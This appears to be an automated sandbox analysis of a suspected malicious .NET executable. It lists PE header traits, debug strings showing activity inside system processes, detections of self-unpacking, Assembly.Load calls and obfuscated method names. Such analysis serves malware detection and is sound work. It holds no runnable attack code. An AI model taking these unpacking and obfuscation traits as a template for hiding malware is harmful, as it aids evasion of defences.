Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 22#U0415.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 22#U0415.exe

Static file information: File size 1198080 > 1048576

Source: 22#U0415.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x123c00

Source: 22#U0415.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: colorcpl.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.1714329535.0000000001148000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1718226263.0000000003280000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718125345.0000000000F80000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdb source: RegSvcs.exe, 00000006.00000002.1705176684.0000000001088000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1705014609.0000000000FB0000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2869550150.0000000000B30000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: colorcpl.pdb source: RegSvcs.exe, 0000000E.00000002.1714329535.0000000001148000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1718226263.0000000003280000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718125345.0000000000F80000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000006.00000002.1705176684.0000000001088000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1705014609.0000000000FB0000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2869550150.0000000000B30000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 00000007.00000002.2888348425.0000000010DDF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2872022981.000000000529F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2870147889.0000000003115000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000C.00000002.2871177410.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000C.00000003.1706604032.0000000004BA1000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000C.00000002.2871177410.0000000004EEE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000C.00000003.1705146042.00000000049FB000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000003.1715666397.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718183252.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000003.1713382860.0000000004548000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718183252.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 0000000C.00000002.2871177410.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000C.00000003.1706604032.0000000004BA1000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000C.00000002.2871177410.0000000004EEE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000C.00000003.1705146042.00000000049FB000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000003.1715666397.00000000046FD000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718183252.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000003.1713382860.0000000004548000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000F.00000002.1718183252.0000000004A4E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 00000007.00000002.2888348425.0000000010DDF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2872022981.000000000529F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000C.00000002.2870147889.0000000003115000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\22#U0415.exe

Unpacked PE file: 0.2.22#U0415.exe.3f0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\22#U0415.exe

Unpacked PE file: 0.2.22#U0415.exe.3f0000.0.unpack

.NET source code contains potential unpacker

Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, IvcPPEq9R8umsYYues.cs	.Net Code: agcUCK2IcZF83xt5Sou System.Reflection.Assembly.Load(byte[])
Source: 0.2.22#U0415.exe.29515f0.4.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.22#U0415.exe.8dd0000.11.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, IvcPPEq9R8umsYYues.cs	.Net Code: agcUCK2IcZF83xt5Sou System.Reflection.Assembly.Load(byte[])
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, IvcPPEq9R8umsYYues.cs	.Net Code: agcUCK2IcZF83xt5Sou System.Reflection.Assembly.Load(byte[])
Source: 8.2.tsnokiirph.exe.3431860.8.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_027377F9 push ss; iretd	0_2_027377FF
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_04E577F8 pushad ; iretd	0_2_04E57801
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_04E57072 push eax; retf	0_2_04E57075
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_0943FE6E push dword ptr [edx+ebp*2-75h]; iretd	0_2_0943FE77
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_094381A1 push E907615Ah; retn 0002h	0_2_094381A6
Source: C:\Users\user\Desktop\22#U0415.exe	Code function: 0_2_094372DD push 8BFFFFFDh; ret	0_2_094372E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_004169CB pushad ; retf	6_2_004169CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00407A0B push cs; retf	6_2_00407A0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0040E329 push eax; iretd	6_2_0040E32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00409BCC push es; iretd	6_2_00409BCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041D3A3 push ss; iretd	6_2_0041D3A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00416C49 push ebp; retf	6_2_00416C56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0040B4C7 push edx; retf	6_2_0040B4CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041D4F2 push eax; ret	6_2_0041D4F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041D4FB push eax; ret	6_2_0041D562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041D4A5 push eax; ret	6_2_0041D4F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0041D55C push eax; ret	6_2_0041D562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_004166D8 push ebp; iretd	6_2_004166E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00407710 push edi; ret	6_2_00407711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_004177F3 push eax; iretd	6_2_00417802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015C225F pushad ; ret	6_2_015C27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015C27FA pushad ; ret	6_2_015C27F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015F09AD push ecx; mov dword ptr [esp], ecx	6_2_015F09B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_015C283D push eax; iretd	6_2_015C2858
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4EAB02 push esp; retn 0000h	7_2_0F4EAB03
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4EAB1E push esp; retn 0000h	7_2_0F4EAB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_0F4EA9B5 push esp; retn 0000h	7_2_0F4EAAE7
Source: C:\Windows\explorer.exe	Code function: 7_2_0F920B1E push esp; retn 0000h	7_2_0F920B1F
Source: C:\Windows\explorer.exe	Code function: 7_2_0F920B02 push esp; retn 0000h	7_2_0F920B03
Source: C:\Windows\explorer.exe	Code function: 7_2_0F9209B5 push esp; retn 0000h	7_2_0F920AE7
Source: C:\Windows\explorer.exe	Code function: 7_2_0FAC2B02 push esp; retn 0000h	7_2_0FAC2B03

Source: initial sample	Static PE information: section name: .text entropy: 7.284920304624236
Source: initial sample	Static PE information: section name: .text entropy: 7.284920304624236

Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, NEb2n8mEPs888B3AiYF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uAZyrmg1SP', 'C9pytayUNR', 'uejyPtkXKk', 'MkPyfGph1t', 'qWhycXgnX3', 'qBXyiRoUSb', 'ueHyl7wleN'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, vgn561rVg0IdutTexK.cs	High entropy of concatenated method names: 'yrHI3FUPR0', 'T5jIk9u0qY', 'EQ6IriJR4S', 'q14It9Fkr2', 'f8bIG9Rbpc', 'j5VISNbCji', 'kkWI1cNYxs', 'ksFIxxTdug', 'j3qIoY0NwT', 'yB8I0SpJRB'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, MLMc0eaACnExPK3of1.cs	High entropy of concatenated method names: 'gO3YM5F96', 'eqPwapKmO', 'D4JTOPfj5', 'WjTsekF4v', 'CNZvhHcQR', 'AUqXkGAO1', 'LMOrduV0hHYTUZSsiB', 'q0UNtCBnQexkb0KSNd', 'mZa43Q9a7', 'g6TySA1KD'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, B3tyHg52XTsWQix3st.cs	High entropy of concatenated method names: 'UTXL7PihSF', 'YpCL8H4nJq', 'GJOLY6AkCL', 'V4ELwCcCMF', 'T2KLRprZMi', 'BUOLT7RkGb', 'WIQLs7snib', 'Nw0LALPBVG', 'qv9LvFgaFV', 'K39LXO6exE'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, RBBNlY0qDo6GV2SCM5.cs	High entropy of concatenated method names: 'xTqLb0gpAo', 'R4vLulBwk5', 'WuGL6VVrY0', 'k856CmK82Z', 'UjO6zDRDZQ', 'hCsLnDG0Jc', 'rxaLmQVYi2', 'Q4wLaZIICj', 'qdgLEEPkL9', 'H8XLFHXaJh'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, xW5PIpCd8BXDaF9ylI.cs	High entropy of concatenated method names: 'XnxWmrWY3N', 'aycWE5tKot', 'DgNWFr2JRn', 'vTkWbOZFPt', 'LCbWpenmQs', 'PnCWHM218B', 'G3MW6X3iOS', 'AVl4lsXZQc', 'B3h4gCU4Fm', 'QA94dOGmj9'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, dTWTwxKJX3fPSU8Lb5.cs	High entropy of concatenated method names: 'qqLOAeEYX1', 'uQpOvgXwNq', 'JOKO9Gc9gH', 'EFDOGm6W1x', 'cNGO1xdOL8', 'Bk5OxMQwjK', 'XkhO0KDbaN', 'tADOBmSxDn', 't1fO3FegXU', 'Ua3OUalEAV'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, rtHAq5XrFIbFNKsJqg.cs	High entropy of concatenated method names: 'IbdHRUWrrQ', 'IAvHsjxB7h', 'E2RuSB0CBT', 'zhMu1IIA2f', 'ugsux5LUWa', 'sMJuoMX0Co', 'N7Zu0jnQOV', 'BN7uBbhPR9', 'Otcu51d2dB', 'drgu31XpAw'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, c0SXvfpvpR6R2nnM5d.cs	High entropy of concatenated method names: 'Dispose', 'anCmdWVPH5', 'FEXaGb815r', 'Wr9YYjISTL', 'wcWmCBRyjO', 'R3dmzP82mW', 'ProcessDialogKey', 'MwaanKrvRD', 'z13amlR4K9', 'tpOaaQW5PI'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, xNeHchvrDZ8btyIpQr.cs	High entropy of concatenated method names: 'p0ouw1iZRT', 'h9SuThCtqT', 'GSpuAZCMAU', 'QJGuv4M1yG', 'WOXuIOCwmw', 'KiDuMGpkDy', 'Kpxujdd6xa', 'GXYu4Fa12U', 'I73uWEQCyd', 'Ly9uyaRlOn'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, bKrvRDdY13lR4K9hpO.cs	High entropy of concatenated method names: 'pxi49MZRj2', 'Ohf4Ge4DbD', 'eMC4SKS0jY', 'Ryn41neng0', 'h8r4rZJ9hY', 'OPX4xVDwFN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, yvnoUZFPsJnPX5aHG4.cs	High entropy of concatenated method names: 'zutmLmmfob', 'bGMmqSx3h7', 'trDmDZ8bty', 'opQmerWtHA', 'QsJmIqgtnI', 'wT3mMCwZ6u', 'lfbJX4n6kXdJFTMv2u', 'fQCAKTu5745b0kQsNh', 'YHQmm4UPqm', 'fyUmE2xxa0'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, M2yqyozVIYBS4MEJyN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MREWOcfDBu', 'CldWI2Rdxh', 'mblWMG9QMv', 'hvvWjLp0PQ', 'TImW4MUrxu', 'bkBWWgaTZL', 'Xx5WySaiBO'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, tkxat1mnEb1VBB9oB7P.cs	High entropy of concatenated method names: 'WGkW7cLP9k', 'lw2W8reF1D', 'qkGWYPG7u4', 'oOTWwJ2QgR', 'YWQWR50kuo', 'XRwWTZQ4cw', 'KsVWstTUHQ', 'fhAWApRvRr', 'lVWWvTamk1', 'pUhWXjvMK7'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, SnIQT39CwZ6u4XEsxh.cs	High entropy of concatenated method names: 'eQD62j0yst', 'YXU6pA6R9Y', 'mr06HPEdBY', 'bQT6L1pZ0f', 'KAE6qwv8xq', 'akCHcLvdVK', 'lUxHieyd2S', 'HFMHlwyHGO', 'nyUHgVP77l', 'jarHdUZODF'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, RmmfobAaGMSx3h70xK.cs	High entropy of concatenated method names: 'ioWpr3jxss', 'fLdptiQTgj', 'q0MpPvLW9D', 'pompf2Gnxf', 'GxOpcTK1uX', 'Dxkpi6EwJW', 'dotplZBTEa', 'Qq1pg4xx2k', 'OYQpdR4apx', 'knIpC3GJwo'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, IvcPPEq9R8umsYYues.cs	High entropy of concatenated method names: 'tPLE2IlgVx', 'E6IEbnDUDS', 'cPtEpAtYFL', 'PhREuyrjts', 'XC3EHSoqSB', 'QKTE6FE8vS', 'ua0ELrLPJg', 'TR7EqPhxDS', 'WKLENcud4C', 'Ct6EDdIeBY'
Source: 0.2.22#U0415.exe.96e0000.14.raw.unpack, UWBRyjgOr3dP82mW5w.cs	High entropy of concatenated method names: 'BiL4bePa9D', 'WqU4pRQY9j', 'OOn4uISqG8', 'it44HZD5Ga', 'k0e46R8tl3', 'IUQ4L5pKxC', 'Mn84qjUllT', 'Ydo4NKRTip', 'QsP4D5cPmD', 'xsM4eE5IRD'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, NEb2n8mEPs888B3AiYF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uAZyrmg1SP', 'C9pytayUNR', 'uejyPtkXKk', 'MkPyfGph1t', 'qWhycXgnX3', 'qBXyiRoUSb', 'ueHyl7wleN'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, vgn561rVg0IdutTexK.cs	High entropy of concatenated method names: 'yrHI3FUPR0', 'T5jIk9u0qY', 'EQ6IriJR4S', 'q14It9Fkr2', 'f8bIG9Rbpc', 'j5VISNbCji', 'kkWI1cNYxs', 'ksFIxxTdug', 'j3qIoY0NwT', 'yB8I0SpJRB'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, MLMc0eaACnExPK3of1.cs	High entropy of concatenated method names: 'gO3YM5F96', 'eqPwapKmO', 'D4JTOPfj5', 'WjTsekF4v', 'CNZvhHcQR', 'AUqXkGAO1', 'LMOrduV0hHYTUZSsiB', 'q0UNtCBnQexkb0KSNd', 'mZa43Q9a7', 'g6TySA1KD'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, B3tyHg52XTsWQix3st.cs	High entropy of concatenated method names: 'UTXL7PihSF', 'YpCL8H4nJq', 'GJOLY6AkCL', 'V4ELwCcCMF', 'T2KLRprZMi', 'BUOLT7RkGb', 'WIQLs7snib', 'Nw0LALPBVG', 'qv9LvFgaFV', 'K39LXO6exE'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, RBBNlY0qDo6GV2SCM5.cs	High entropy of concatenated method names: 'xTqLb0gpAo', 'R4vLulBwk5', 'WuGL6VVrY0', 'k856CmK82Z', 'UjO6zDRDZQ', 'hCsLnDG0Jc', 'rxaLmQVYi2', 'Q4wLaZIICj', 'qdgLEEPkL9', 'H8XLFHXaJh'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, xW5PIpCd8BXDaF9ylI.cs	High entropy of concatenated method names: 'XnxWmrWY3N', 'aycWE5tKot', 'DgNWFr2JRn', 'vTkWbOZFPt', 'LCbWpenmQs', 'PnCWHM218B', 'G3MW6X3iOS', 'AVl4lsXZQc', 'B3h4gCU4Fm', 'QA94dOGmj9'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, dTWTwxKJX3fPSU8Lb5.cs	High entropy of concatenated method names: 'qqLOAeEYX1', 'uQpOvgXwNq', 'JOKO9Gc9gH', 'EFDOGm6W1x', 'cNGO1xdOL8', 'Bk5OxMQwjK', 'XkhO0KDbaN', 'tADOBmSxDn', 't1fO3FegXU', 'Ua3OUalEAV'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, rtHAq5XrFIbFNKsJqg.cs	High entropy of concatenated method names: 'IbdHRUWrrQ', 'IAvHsjxB7h', 'E2RuSB0CBT', 'zhMu1IIA2f', 'ugsux5LUWa', 'sMJuoMX0Co', 'N7Zu0jnQOV', 'BN7uBbhPR9', 'Otcu51d2dB', 'drgu31XpAw'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, c0SXvfpvpR6R2nnM5d.cs	High entropy of concatenated method names: 'Dispose', 'anCmdWVPH5', 'FEXaGb815r', 'Wr9YYjISTL', 'wcWmCBRyjO', 'R3dmzP82mW', 'ProcessDialogKey', 'MwaanKrvRD', 'z13amlR4K9', 'tpOaaQW5PI'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, xNeHchvrDZ8btyIpQr.cs	High entropy of concatenated method names: 'p0ouw1iZRT', 'h9SuThCtqT', 'GSpuAZCMAU', 'QJGuv4M1yG', 'WOXuIOCwmw', 'KiDuMGpkDy', 'Kpxujdd6xa', 'GXYu4Fa12U', 'I73uWEQCyd', 'Ly9uyaRlOn'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, bKrvRDdY13lR4K9hpO.cs	High entropy of concatenated method names: 'pxi49MZRj2', 'Ohf4Ge4DbD', 'eMC4SKS0jY', 'Ryn41neng0', 'h8r4rZJ9hY', 'OPX4xVDwFN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, yvnoUZFPsJnPX5aHG4.cs	High entropy of concatenated method names: 'zutmLmmfob', 'bGMmqSx3h7', 'trDmDZ8bty', 'opQmerWtHA', 'QsJmIqgtnI', 'wT3mMCwZ6u', 'lfbJX4n6kXdJFTMv2u', 'fQCAKTu5745b0kQsNh', 'YHQmm4UPqm', 'fyUmE2xxa0'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, M2yqyozVIYBS4MEJyN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MREWOcfDBu', 'CldWI2Rdxh', 'mblWMG9QMv', 'hvvWjLp0PQ', 'TImW4MUrxu', 'bkBWWgaTZL', 'Xx5WySaiBO'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, tkxat1mnEb1VBB9oB7P.cs	High entropy of concatenated method names: 'WGkW7cLP9k', 'lw2W8reF1D', 'qkGWYPG7u4', 'oOTWwJ2QgR', 'YWQWR50kuo', 'XRwWTZQ4cw', 'KsVWstTUHQ', 'fhAWApRvRr', 'lVWWvTamk1', 'pUhWXjvMK7'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, SnIQT39CwZ6u4XEsxh.cs	High entropy of concatenated method names: 'eQD62j0yst', 'YXU6pA6R9Y', 'mr06HPEdBY', 'bQT6L1pZ0f', 'KAE6qwv8xq', 'akCHcLvdVK', 'lUxHieyd2S', 'HFMHlwyHGO', 'nyUHgVP77l', 'jarHdUZODF'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, RmmfobAaGMSx3h70xK.cs	High entropy of concatenated method names: 'ioWpr3jxss', 'fLdptiQTgj', 'q0MpPvLW9D', 'pompf2Gnxf', 'GxOpcTK1uX', 'Dxkpi6EwJW', 'dotplZBTEa', 'Qq1pg4xx2k', 'OYQpdR4apx', 'knIpC3GJwo'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, IvcPPEq9R8umsYYues.cs	High entropy of concatenated method names: 'tPLE2IlgVx', 'E6IEbnDUDS', 'cPtEpAtYFL', 'PhREuyrjts', 'XC3EHSoqSB', 'QKTE6FE8vS', 'ua0ELrLPJg', 'TR7EqPhxDS', 'WKLENcud4C', 'Ct6EDdIeBY'
Source: 0.2.22#U0415.exe.44ec7a0.10.raw.unpack, UWBRyjgOr3dP82mW5w.cs	High entropy of concatenated method names: 'BiL4bePa9D', 'WqU4pRQY9j', 'OOn4uISqG8', 'it44HZD5Ga', 'k0e46R8tl3', 'IUQ4L5pKxC', 'Mn84qjUllT', 'Ydo4NKRTip', 'QsP4D5cPmD', 'xsM4eE5IRD'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, NEb2n8mEPs888B3AiYF.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uAZyrmg1SP', 'C9pytayUNR', 'uejyPtkXKk', 'MkPyfGph1t', 'qWhycXgnX3', 'qBXyiRoUSb', 'ueHyl7wleN'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, vgn561rVg0IdutTexK.cs	High entropy of concatenated method names: 'yrHI3FUPR0', 'T5jIk9u0qY', 'EQ6IriJR4S', 'q14It9Fkr2', 'f8bIG9Rbpc', 'j5VISNbCji', 'kkWI1cNYxs', 'ksFIxxTdug', 'j3qIoY0NwT', 'yB8I0SpJRB'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, MLMc0eaACnExPK3of1.cs	High entropy of concatenated method names: 'gO3YM5F96', 'eqPwapKmO', 'D4JTOPfj5', 'WjTsekF4v', 'CNZvhHcQR', 'AUqXkGAO1', 'LMOrduV0hHYTUZSsiB', 'q0UNtCBnQexkb0KSNd', 'mZa43Q9a7', 'g6TySA1KD'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, B3tyHg52XTsWQix3st.cs	High entropy of concatenated method names: 'UTXL7PihSF', 'YpCL8H4nJq', 'GJOLY6AkCL', 'V4ELwCcCMF', 'T2KLRprZMi', 'BUOLT7RkGb', 'WIQLs7snib', 'Nw0LALPBVG', 'qv9LvFgaFV', 'K39LXO6exE'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, RBBNlY0qDo6GV2SCM5.cs	High entropy of concatenated method names: 'xTqLb0gpAo', 'R4vLulBwk5', 'WuGL6VVrY0', 'k856CmK82Z', 'UjO6zDRDZQ', 'hCsLnDG0Jc', 'rxaLmQVYi2', 'Q4wLaZIICj', 'qdgLEEPkL9', 'H8XLFHXaJh'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, xW5PIpCd8BXDaF9ylI.cs	High entropy of concatenated method names: 'XnxWmrWY3N', 'aycWE5tKot', 'DgNWFr2JRn', 'vTkWbOZFPt', 'LCbWpenmQs', 'PnCWHM218B', 'G3MW6X3iOS', 'AVl4lsXZQc', 'B3h4gCU4Fm', 'QA94dOGmj9'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, dTWTwxKJX3fPSU8Lb5.cs	High entropy of concatenated method names: 'qqLOAeEYX1', 'uQpOvgXwNq', 'JOKO9Gc9gH', 'EFDOGm6W1x', 'cNGO1xdOL8', 'Bk5OxMQwjK', 'XkhO0KDbaN', 'tADOBmSxDn', 't1fO3FegXU', 'Ua3OUalEAV'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, rtHAq5XrFIbFNKsJqg.cs	High entropy of concatenated method names: 'IbdHRUWrrQ', 'IAvHsjxB7h', 'E2RuSB0CBT', 'zhMu1IIA2f', 'ugsux5LUWa', 'sMJuoMX0Co', 'N7Zu0jnQOV', 'BN7uBbhPR9', 'Otcu51d2dB', 'drgu31XpAw'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, c0SXvfpvpR6R2nnM5d.cs	High entropy of concatenated method names: 'Dispose', 'anCmdWVPH5', 'FEXaGb815r', 'Wr9YYjISTL', 'wcWmCBRyjO', 'R3dmzP82mW', 'ProcessDialogKey', 'MwaanKrvRD', 'z13amlR4K9', 'tpOaaQW5PI'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, xNeHchvrDZ8btyIpQr.cs	High entropy of concatenated method names: 'p0ouw1iZRT', 'h9SuThCtqT', 'GSpuAZCMAU', 'QJGuv4M1yG', 'WOXuIOCwmw', 'KiDuMGpkDy', 'Kpxujdd6xa', 'GXYu4Fa12U', 'I73uWEQCyd', 'Ly9uyaRlOn'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, bKrvRDdY13lR4K9hpO.cs	High entropy of concatenated method names: 'pxi49MZRj2', 'Ohf4Ge4DbD', 'eMC4SKS0jY', 'Ryn41neng0', 'h8r4rZJ9hY', 'OPX4xVDwFN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, yvnoUZFPsJnPX5aHG4.cs	High entropy of concatenated method names: 'zutmLmmfob', 'bGMmqSx3h7', 'trDmDZ8bty', 'opQmerWtHA', 'QsJmIqgtnI', 'wT3mMCwZ6u', 'lfbJX4n6kXdJFTMv2u', 'fQCAKTu5745b0kQsNh', 'YHQmm4UPqm', 'fyUmE2xxa0'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, M2yqyozVIYBS4MEJyN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MREWOcfDBu', 'CldWI2Rdxh', 'mblWMG9QMv', 'hvvWjLp0PQ', 'TImW4MUrxu', 'bkBWWgaTZL', 'Xx5WySaiBO'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, tkxat1mnEb1VBB9oB7P.cs	High entropy of concatenated method names: 'WGkW7cLP9k', 'lw2W8reF1D', 'qkGWYPG7u4', 'oOTWwJ2QgR', 'YWQWR50kuo', 'XRwWTZQ4cw', 'KsVWstTUHQ', 'fhAWApRvRr', 'lVWWvTamk1', 'pUhWXjvMK7'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, SnIQT39CwZ6u4XEsxh.cs	High entropy of concatenated method names: 'eQD62j0yst', 'YXU6pA6R9Y', 'mr06HPEdBY', 'bQT6L1pZ0f', 'KAE6qwv8xq', 'akCHcLvdVK', 'lUxHieyd2S', 'HFMHlwyHGO', 'nyUHgVP77l', 'jarHdUZODF'
Source: 0.2.22#U0415.exe.4484980.9.raw.unpack, RmmfobAaGMSx3h70xK.cs	High entropy of concatenated method names: 'ioWpr3jxss', 'fLdptiQTgj', 'q0MpPvLW9D', 'pompf2Gnxf', 'GxOpcTK1uX', 'Dxkpi6EwJW', 'dotplZBTEa', 'Qq1pg4xx2k', 'OYQpdR4apx', 'knIpC3GJwo'
